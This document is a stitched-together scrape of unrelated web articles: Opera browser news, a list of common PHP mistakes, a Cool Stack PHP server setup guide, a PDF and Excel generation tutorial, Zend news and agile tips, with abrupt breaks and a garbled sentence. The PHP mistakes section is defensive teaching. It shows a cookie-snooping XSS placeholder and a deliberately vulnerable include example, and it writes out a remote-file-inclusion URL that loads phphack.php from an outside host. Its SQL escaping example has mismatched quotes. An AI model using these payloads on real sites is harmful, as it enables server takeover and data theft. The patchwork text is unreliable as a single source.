Developing the web contents so as to meet the guidelines specified in the WCAG2.0 makes the content accessible to more audience.

…more about WCAG.

Obviously, Kestrel is available for several platforms including Windows, Linux and Mac OS X. Although the developers didn’t mention it, I bet Kestrel will be also available in a mobile flavor.

Because I’m sure you expected it, I should tell you that Opera 9.5 Alpha also includes several mail improvements that will allow you to control the inbox easier than before. Beside the functionality updates, the browser comes with “a new mail backend and new IMAP support.”

“Note to existing M2 users: Please be aware that you will need to install this version on top of your existing Opera version to use this version for mail. Opera will then re-index all your email, something which can take several minutes if you have thousands of emails,” Opera Software wanted to mention.

As you can see, the battle between the web-browser is getting more and more interesting as numerous companies are attracted by the competition. Opera seems to become one of the top competitors after Safari also joined the fight which was led until now by Microsoft’s Internet Explorer and by Mozilla’s Firefox.

echo $_GET['username'];

Can for instance output:
<script>/*snooping cookie or changing admin password script*/</script>

It is an apparent security risk not to sanitize untrusted data before output. Besides you might end up with pages looking very messy if you do not thread user input the right way.

How to fix it:
Basically you need to convert < , >, ‘ and ” to their proper entities (< , > ‘ , and “) . The functions htmlspecialchars and htmlentities() do the work.

So here is the right way:
echo htmlspecialchars($_GET['username'], ENT_QUOTES);
2. Not Escaping SQL input
When querying your database all ways make sure untrusted data gets escaped else your application will be vulnerable to SQL-injections and unreliable, some coders think that they have covered their asses by having magic_quotes on in their php.ini. The problem is that untrusted input can come from other sources than $_GET, $_POST and $_COOKIE (crawling other websites or using input from the database). And what happens if magic_quotes suddenly is set to OFF?

How to fix it:
I recommend setting magic_quotes to off in php.ini or by using .htaccess and then using mysql_real_escape_string() on all variables used in SQL-expressions.

<?php
$sql = “UPDATE users SET
name=’.mysql_real_escape_string($name).’
WHERE id=’.mysql_real_escape_string ($id).’”;
mysql_query($sql);
?>

In PHP5 combined with mysql5 you can also use bindings.

If you leave magic_quotes On you will just have to trust your instinct.
3. Wrong use of HTTP-header related functions:

header(), session_start(), setcookie()
Have you ever encountered this warning? “warning: Cannot add header information – headers already sent [....]

Most likely you have either during development or when deploying PHP applications. When your browser downloads a web page the data response from the server is structured in two different parts: The header part and the content part.

The header consist of not visible data such as cookies to be set or if the browser should redirect to another location. The header always comes first.

The content part consists of the visible content HTML, image data and so on.

If output_buffering is set to Off in php.ini your. When the script outputs during execution all header related functions (setcookie(), header(), session_start()) must be called before any output. The problem is when somebody develops on one platform configuration and deploys to another platform configuration, then redirects stops working, cookies and sessions are not being stored…

How to fix it:
The right way is actually very simple make your script call all header related functions before you start any output and set output_buffering = Off in php.ini (at your development platform). If this is a problem on existing scripts you can all ways hack about with the output control functions.
4. Requiring and including files using untrusted data
Again and again do not trust data you do not declare implicitly: Including and requiring files from but not limited to $_GET, $_POST and $_COOKIE is a stupid and mortal path, you want to control which exacts code your server executes.

Example:
index.php
<?
//including header, config, database connection, etc
include($_GET['filename']);
//including footer
?>

Any hacker can now request following URL: http://www.yourdomain.com/index.php?filename=anyfile.txt

By doing so the hacker can extract confidential information and execute PHP scripts stored on the server. Now if allow_url_fopen is set to On in your PHP.ini you will be doomed:

Try this one out:
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php

Then your script include and parse any code which the web page on http://www.youaredoomed.com/phphack.php outputs. Doing so he can for instance send spam mails, change passwords, delete files…. I have a very limited imagination.

How to fix it:
You have to control which files the script is allowed to include and which it is not allowed to include.

Note: This is only a quick fix:
<?
//Include only files that are allowed.
$allowedFiles = array(‘file1.txt’,'file2.txt’,'file3.txt’);
if(in_array((string)$_GET['filename'],$allowedFiles)) {
include($_GET['filename']);
}
else{
exit(‘not allowed’);
}
?>
5. Syntax errors
This covers all the parse and syntax errors YOU make during development, these are probably uncountable, right? Usually it is a bracket, semi-colon, quotation mark or parenthesis that is missing or placed wrong it is a time eater and that is why I have put it on the list. There is only one way to fight it: Become aware of which syntax errors you make and find ways to avoid repeating them! Of course a good text editor will help you a lot here please, do not use notepad.
6. No or little use of Object Orientation
Too many systems I have seen and been working with have this problem. They simply do not have any object orientation. Yes object and classes for a beginner are abstract but if for instance you build a shop system and you are not being object orientated, then the source code will become unmaintainable with time and size. PHP has been supporting basic object orientation since PHP4 and since PHP5 a lot more and a lot better, so get your ass on to using it.
7. Not using a framework
95% of all development with PHP is about developing the same four things: Create, edit, list and delete. To do all this in pure PHP without using a PHP MVC Framework of some kind (let it be home made or open source) is just plain stupid and a waste of YOUR time (of course there are exceptions and you can have good explanation on why you don’t use a framework).

I talk out of experience and there is so much PHP out there but so little use of frameworks. Get your fingers dirty now.
8. Not knowing about existing functionality
One of the strong things about PHP is that there’s so much functionality available in the PHP core but also in the pure PHP extensions. However time again and again scripts people are inventing the deep plate. I am guilty in doing this, but it is waste of time where you should be saving your time. Even when PHP functionality is out of question you can in a lot of situations save yourself time by using exec() to execute from shell.

Save yourself time searching the manual on www.php.net and Google, keep yourself updated on new features in future releases and by ask the right people when needed.

9. Using old PHP versions
This problem primarily relates to people developing on PHP4 to put it short you are developing on a deprecating platform and not using the full potential of your knowledge move on, there’s a lot of good stuff and functionality in PHP5. And it is really not a big deal to change to PHP5 most applications only need a few moderations or no moderations to cope with the change.

Secondary there is the security risk of running on old and unpatched software it might end up damaging your applications.

According to Damien Seguy (founder of the French PHP portal http://www.nexen.net) 12% of all PHP servers where running PHP5 by the start of November 2006.

Read the article here (French).

So if you are developing PHP you are most likely (88%) still doing it on PHP4, shame on you!
10. Double escaping quotes
Have you ever seen a web page display a text with \’ or \” , it usually happens when a script is made for magic_quotes of (php.ini) and is deployed on a site with magic_quotes on. First PHP runs addslashes() on all GET, POST and COOKIE data then afterwards one more time when the data is being stored.

Original text:
It’s a string

After magic quotes on script start:
It\’s a string

On query storage:
It\\’s a string

HTML output:
It\’s a string

Another scenario that makes this occur is when a user tries to sign up and inputs invalid data, the user then get presented to the same form, this time with the input escaped, the second time the user posts with the valid data the input is escaped another time.

This stuff still happens way too much however mostly new and inexperienced people encounter this.

Besides supporting many databases (for example, Oracle, MySQL, and PostgreSQL), the PHP 5 runtime that is bundled with Cool Stack 1.2 also works with FastCGI. That means you can deploy PHP applications on top of Web servers like high-performing, enterprise-ready Sun Java System Web Server 7.0 (henceforth, Web Server). Deploying on Web Server nets you the performance benefit of its high scalability with optimized Cool Stack PHP 5—a win-win situation.

This article steps you through the deployment procedure.

Note: Type each of the command lines in this article on one line even though, because of screen-width constraints, some of them wrap to the next line.
Contents
 

• Installing and Configuring Web Server
• Installing Cool Stack
• Configuring Cool Stack PHP With Web Server 

Installing and Configuring Web Server

You can download and deploy Web Server for free. To learn more about its capabilities, see the “What’s New in This Release” section in the Release Notes. Also of help are this custom installation screencast and Getting Started Guide.

The procedure that follows shows the steps in the Web Server Administration Server’s command-line interface (CLI). You can also perform them from the browser-based administration GUI.

At installation, Web Server offers a default configuration. Optionally, you can create a configuration-cum-instance. To step through the deployment procedure, create one by following these steps:

   1. Start the Administration Server. Type:

      /sun/webserver7> admin-server/bin/startserv

   2. Create the configuration. Type:

      /sun/webserver7> bin/wadm create-config –user=admin –http-port=8080 –server-name=sriramn.red.iplanet.com coolstack

   3. Create the instance. Type:

      /sun/webserver7> bin/wadm create-instance –user=admin –config=coolstack sriramn.red.iplanet.com

Installing Cool Stack

To install Cool Stack, do the following:

Note: You must first create a Sun account online and then log in to download.

   1. Download Cool Stack 1.2.

      On the downloads page, select and download the Core Libraries (CSKruntime package) and Apache-PHP 5 (CSKamp) components.

   2. Unzip the downloaded packages. Type, for example:

      bunzip2 -f CSKruntime_1.2_sparc.pkg.gz
      bunzip2 -f CSKamp_1.2_sparc.pkg.gz

      Note: If you are using Solaris OS on Intel or AMD hardware, download the x86 version of those packages, after which the downloaded files will be named CSKruntime_1.2_x86.pkg.bz2 and CSKamp_1.2_x86.pkg.bz2.

   3. Become root and install the packages.

          * For Solaris SPARC hardware, type:

            pkgadd -d CSKruntime_1.2_sparc.pkg
            pkgadd -d CSKamp_1.2_sparc.pkg

          * For Solaris x86 hardware, if you are using SolarisCSKruntime_1.2_x86.pkg, type:

            pkgadd -d CSKruntime_1.2_x86.pkg

            Otherwise, type:

            pkgadd -d CSKamp_1.2_x86.pkg

Configuring Cool Stack PHP With Web Server

Next, do the following:

   1. Go to the Cool Stack PHP 5 installation location. Type:

      cd /opt/coolstack/php5

      In that directory is a script called setup-ws7-php.sh.

   2. Run setup-ws7-php.sh. Type:

      ./setup-ws7-php.sh

      This message is displayed:

      Usage:
      This script will configure Coolstack PHP with Sun Java System Web Server
      7. Here, you will need to provide the top level location of your Web Server
      7 installation and your Web Server 7 instance_name name to which this
      script should configure to run PHP scripts.

      Enter your Web Server installation location(/sun/webserver7):

      
   3. Type the full path for your Web Server installation.

The script then prompts you to type a Web Server instance name. That name is the path to a directory in your installation location—one that contains all the configuration files for running your Web site. If you are using Web Server in Sun Java Enterprise System 5, your instances are under /var/opt/SUNWwbsvr7.

For the example in this article, cite the instance https-coolstack that you created previously. To enable a different instance for PHP, type that instance name. Your instance is then ready for PHP, which you can deploy with Cool Stack 1.2 PHP on Web Server.

Finally, do the following:

   1. Start Web Server. Type:

      /sun/webserver7/https-coolstack/bin/startserv

   2. Create sample PHP files under /sun/webserver7/https-coolstack/docs.

PHP, meanwhile, has become one of the most commonly used scripting languages on the web today, with 35 per cent of web sites running PHP. The TIOBE index of programming languages also indicates an increase in the usage of PHP.

Given the prevelance of PHP, Excel and PDF it’s fortunate there exists class libraries for the generation of PDF documents and Excel spreadsheets using PHP. In my latest guide to PHP, I shall look at generating an Excel spreadsheet using the PHP Extension and Application Repository (PEAR) module, Spreadsheet_Excel_Writer and the ClibPDF PHP library to generate a PDF report. Along the way I’ll dig into PDF and Excel report features such as setting fonts and adding a hyperlink.
Installing ClibPDF

First, install PHP 5 and Apache2 HTTP Server and configure the Apache server with PHP. We won’t discuss configuring Apache server with PHP as it was discussed in an earlier article on PHP, Accessing DB2 UDB with PHP. The ClibPDF PHP class library extension is included in the Collection of PECL modules for PHP 5.3. Extract the php_cpdf.dll from the PECL modules zip file to the C:/PHP/ext directory. Add the following PHP directive to the php.ini configuration file.

 extension=php_cpdf.dll

Restart the Apache HTTP server.
Creating a PDF Document with ClibPDF

Create a PHP file catalog.php in the C:\Apache2\htdocs directory, the document root directory of Apache2 server. In the PHP file, create a new PDF document using the cpdf_open ( ) function. If document compression is to be set, specify compression as a non 0 value. A file name may be specified to output the generated PDF document. If filename is not specified an in memory PDF document is created that may be output to a file or stdout.

$cpdf=cpdf_open(0);

Set the title of the document.

cpdf_set_title($cpdf, “Catalog PDF”);

Start a new page using cpdf_page_init(). Specify page number as 1, and page size as A4 (595×842). Set orientation to portrait (0). Orientation may also be set to landscape (1). The unit parameter is optional and specifies the number of postscript points per unit; the default value is 72, which corresponds to 1 inch.

cpdf_page_init($cpdf, 1, 0, 595, 842);

Add a bookmark for the current page. Specify the text of the bookmark in the text parameter.

cpdf_add_outline($cpdf, 0, 0, 0, 1, “Page 1″);

Next, add title text of the PDF document. Start a text section with cpdf_begin_text ( ). Set the font to Courier-Bold, font size to 25 and font encoding to WinAnsiEncoding using cpdf_set_font ( ). Encoding may be set to MacRomanEncoding, MacExpertEncoding, WinAnsiEncoding or NULL. If encoding is set to NULL, the font’s built-in encoding is used.

cpdf_set_font($cpdf, “Courier-Bold”, 25, “WinAnsiEncoding”);

Set the coordinates of the text with cpdf_set_text_pos ( ). The mode parameter specifies the unit length in postscript points. If mode is 0 or is omitted the default unit length is used.

cpdf_set_text_pos($cpdf,4.70,7.5);

Specify how text is to be rendered. A rendermode value of 0 fills the text and a rendermode value of 1 uses stroke text.

cpdf_set_text_rendering($cpdf, 1);

Add the text to the PDF document using cpdf_text( ). Text coordinates may be specified with cpdf_text(). The mode parameter in cpdf_text() specifies the unit length in postscript points. The orientation parameter specifies the rotation of the text in degrees. The alignmode parameter specifies the alignment of the text.

cpdf_text($cpdf,”Catalog PDF”);

The alignmode parameter specifies alignment with respect to the (x,y) coordinates of the text. End the title section with cpdf_end_text( ).

cpdf_end_text($cpdf);

Next, add some text to the PDF document using cpdf_begin_text(), cpdf_text() and cpdf_end_text() functions. Text is added to a new line using cpdf_continue_text( ). Create a table using cpdf_rect(). Add header row cells using cpdf_rect( ) and cpdf_stroke( ).

cpdf_rect($cpdf, 1.0, 6.0, 2.0, 0.5);
cpdf_stroke($cpdf);

Add text to the header cells. Specify the text position. Set text rendering to fill text. Set text font name, font size and font encoding. A row of data is added similar to a header row. A hyperlink may be added to row text using cpdf_set_action_url ( ). For example add an hyperlink to the title column data.

cpdf_set_action_url ( $cpdf, 7.20, 5.70, 8.5, 5.85, “http://www-128.ibm.com/developerworks/java/library/x-jaxpval.html“);

End the PDF page using cpdf_finalize_page ( ). End the PDF document using cpdf_finalize ( )

cpdf_finalize_page($cpdf, 1);
cpdf_finalize($cpdf);

Set the Content-type header to application/pdf and save the PDF document to a file using cpdf_save_to_file ( ).

Header(“Content-type: application/pdf”);
cpdf_save_to_file($cpdf,”catalog.pdf”);

The PHP script, catalog.php, used to generate an example PDF document is available in resources zip here. Run the catalog.php script with the URL http://localhost/catalog.php.
Installing Spreadsheet_Excel_Writer

The Spreadsheet_Excel_Writer is available as a PEAR module. Therefore, first install the PEAR package Manager. Download the PEAR PHP file. and save the file as go-pear.php in the C:/PHP directory, the directory in which PHP 5 is installed. Install the PEAR Package Manager with the following command.

C:/PHP>php go-pear.php

The php.ini configuration file gets modified in installing the PEAR Package Manager. Therefore, restart the Apache2 HTTP server. Download Spreadsheet_Excel_Writer version 0.9.1. Save the zip file to the C:/PHP directory. The Spreadsheet_Excel_Writer has a required dependency, the PEAR OLE 0.5 package. Install the OLE 0.5 package with the following command.

C:/PHP>pear install channel://pear.php.net/OLE-0.5

Install the Spreadsheet_Excel_Writer with the following command.

C:/PHP>pear install Spreadsheet_Excel_Writer-0.9.1.tgz

Creating an Excel Spreadsheet

Create a PHP script, catalog-excel.php, in the C:\Apache2\\htdocs directory. Create a Workbook object. Specify filename as catalog.xls.

$workbook = new Spreadsheet_Excel_Writer(‘catalog.xls’);

Add a worksheet to the workbook. If sheet name is not specified the sheet name is Sheeti, with i in [1..].

$worksheet =& $workbook->addWorksheet(‘Catalog’);

Set page margins in inches. Center the page horizontally.

$worksheet->setMargins(0.25);
$worksheet->centerHorizontally(1);

Set the worksheet as the active worksheet.

$worksheet->activate();

First, we shall add a title to the worksheet. Add a format to the workbook for the title. Set the text to bold. Set the color of the cell’s content to “blue”. Set the font size to 25 pixels. Merge the cells in the row by setting the cell alignment to ‘merge’.

$format_title =& $workbook->addFormat();
$format_title->setBold();
$format_title->setColor(‘blue’);
$format_title->setSize(25);
$format_title->setAlign(‘merge’);

Set the worksheet title to “Catalog Spreadsheet” in the first row and the third column using the Worksheet::write() function. The rows and columns in a worksheet are 0 indexed. The $format_title format that we created previously is used to add the title.

$worksheet->write(0, 2, ‘Catalog Spreadsheet’, $format_title);

Next, add a header row for a catalog. Add another format to the workbook for the header row. Set text to bold and font size to 15 pixels. Create a format for the data to be added to the worksheet. Set the font style to italic using Format::setItalic() and font size to 12 pixels. Set alignment of text to ‘center’ with Format::setAlign(). Horizontal alignment may be set to left, center, right, fill, justify, merge, or equal_space. Vertical alignment may be set to top, vcenter, bottom, vjustify, or vequal_space. A combination of horizontal and vertical alignment may be specified by invoking the setAlign() function more than once. Using the format for row data add a row of data with Worksheet::write(). The rows and columns are 0 indexed. Add a hyperlink to the Title column value with Worksheet::writeUrl(). The $url parameter specifies the URL of the hyperlink and the $string parameter specifies the label for the hyperlink.

Catalog-excel.php for creating an Excel spreadsheet is available in resources zip here. Run the PHP script with the URL http://localhost/catalog.php to create an Excel spreadsheet in the htdocs directory.

After all that you should now have an Excel spreadsheet that looks similar to my screen shot.

Excel Spreadsheet generated with PHP.

If you have, then you’ve successfully created a document in the business world’s chosen medium for expressing information using one of the internet’s hottest programming languages.

Today, Zend makes its latest move on the enterprise, by throwing open early code for an up-coming PHP suite based on Eclipse. Zend thinks this will let it integrate with other Eclipse-based Java tools from IBM and Oracle.

Oracle, meanwhile, will try to earn brownie points with the PHP community by releasing a PHP driver for connection pooling with its new 11g database. The driver lets developers build architectures that satisfy the need for speed without bolting on more servers or using client-side caching, Zend said.

Opening its conference and expo, Zend will announce a public beta for Zend Studio for Eclipse, due in the first quarter of 2008. Zend Studio for Eclipse builds on the Eclipse PHP Developer Tools (PDT) project – which it co-developed through Eclipse – by adding management tools missing in the free version of the platform serving lifecycle support, unit testing and profiling.

That functionality will cost $299 per developer, although those with a Zend Studio support contract get the Eclipse-based version of Studio for free.

Why so generous? The Eclipse-based Studio is important for Zend: as well as tapping into IBM and Oracle tools, it adds integration with Zend’s own application server and the Zend Framework that launched this year into a crowded framework market of more than 130 AJAX frameworks. Zend wants to establish a critical mass of developers and partners to ensure the long-term survival of its scripting framework.

“The commercial version [Zend Studio for Eclipse] looks at what a business developer needs building critical business applications,” Zend co-founder and co-chief technology officer Andy Gutmans told The Register.

By basing its PHP platform on Eclipse, Gutmans believes that – in the long term – Zend can deliver an environment for building applications using PHP and Java.

That’s a tall order, given that Java vendors such as Codegear, who are bigger than Zend,are adding scripting to their Java IDEs or rolling out their own scripting tools. Also there’s that price, with many developers finding free versions of tools can often meet their needs.

Regardless: “With Eclipse we can now work towards having PHP development and Java development in the same tool and provide real value,” Gutmans declared.

Database integration work is an area where Zend could score big over rivals. The only thing better than a good scripting language these days is a fast and lightweight database to store objects and information. Zend’s work with IBM and Oracle on the Zend Core will help here. The only problem? MySQL, which scripting developers have been gravitating towards instead of IBM or Oracle. Zend is also a MySQL partner

2. Evolve by learning a little of everything. “Don’t start with fragile agile, where you have a few pieces of the process, but nothing that is really going to make a difference in your organization”.

3. Educate the “organizational antibodies”. “After a successful project, they come out of the woodwork to declare that it was a fluke, to squelch the transition. Start with a pilot project, but be sure to take the time to dispel the myths about agile throughout the organization. Work with people who aren’t part of that project. These are your future agile communities”.

4. Sell the risks of not going agile. “You can’t sell, say, pair programming. It’s a mistake to try. But you can sell the risks of solo programming. Focusing the risks tends to be a good thing”.

5. Business trumps process. “Once I say that to executives, they breathe a sigh of relief. At the end of the day, you’ve got to be in business. Understand that business concerns sometimes – not all the time – are more important than process concerns”.

6. Engage the entire organization. “Talk to the executives and management. Talk to customers, subject matter experts, technical writers. Get everyone involved. Dispel their fears that there’s no place for them in this new process”.

7. Pick a big important project. “If you start with some big hairy project, there’s a good chance you’ll automatically cover several of the previous tips”.

8. Handle the scaling problems. “This is an issue with agile. E-learning and a kind of serialized knowledge transfer can help”.

9. Gather metrics. “This one trips people up. If you don’t gather metrics for a living, work with an expert. With documented evidence that agile is making you more productive you’ll have a better chance of keeping it in place when there’s a management reshuffle”.

10. Fail fast. “In this day and age, if you want to be successful in software, you’ve got to have the ability to fail fast. You want to see problems very quickly. But it’s not just about testing. This is an attitude shift. Failure is not a bad thing; it’s a way to learn”